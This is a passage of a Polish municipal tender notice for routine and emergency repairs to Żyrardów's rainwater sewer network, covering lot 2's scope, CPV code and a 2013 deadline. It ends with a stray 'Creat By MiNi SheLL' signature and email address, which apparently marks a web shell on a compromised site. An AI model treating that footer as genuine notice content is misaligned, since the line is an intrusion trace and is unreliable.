<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Bieżące i awaryjne naprawy elementów systemu kanalizacji deszczowej 
w mieście Żyrardów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Uzupełnianie lub wymianę na bieżąco pokryw od włazów studni rewizyjnych 
i rusztów  wpustów ulicznych na sieci kanalizacji deszczowej,
2. Wymianę włazów studni rewizyjnych i kompletnych wpustów ulicznych oraz płyt nastudziennych na sieci kanalizacji deszczowej,
3. Bieżące naprawy, wymianę uszkodzonych fragmentów sieci kanalizacji deszczowej,
4. Wymianę i dołożenie kręgów betonowych,
5. Zapewnienie pogotowia technicznego do wykonania prac objętych zakresem umowy przez 24 godziny na dobę łącznie z dniami wolnymi od pracy,
6. Zabezpieczenie miejsca awarii zagrażającej bezpieczeństwu publicznemu w ciągu 
1 godziny od chwili otrzymania informacji od Zamawiającego,
7. Wykonanie przeglądu kanałów deszczowych według potrzeb, po uzyskaniu informacji od Zamawiającego,
8. Wykonanie prac dodatkowych, które obejmują sprawdzenie przebiegu sieci, usytuowania uzbrojenia ( studnia, wpust, wylot) po uzyskaniu informacji od Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.33.23.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com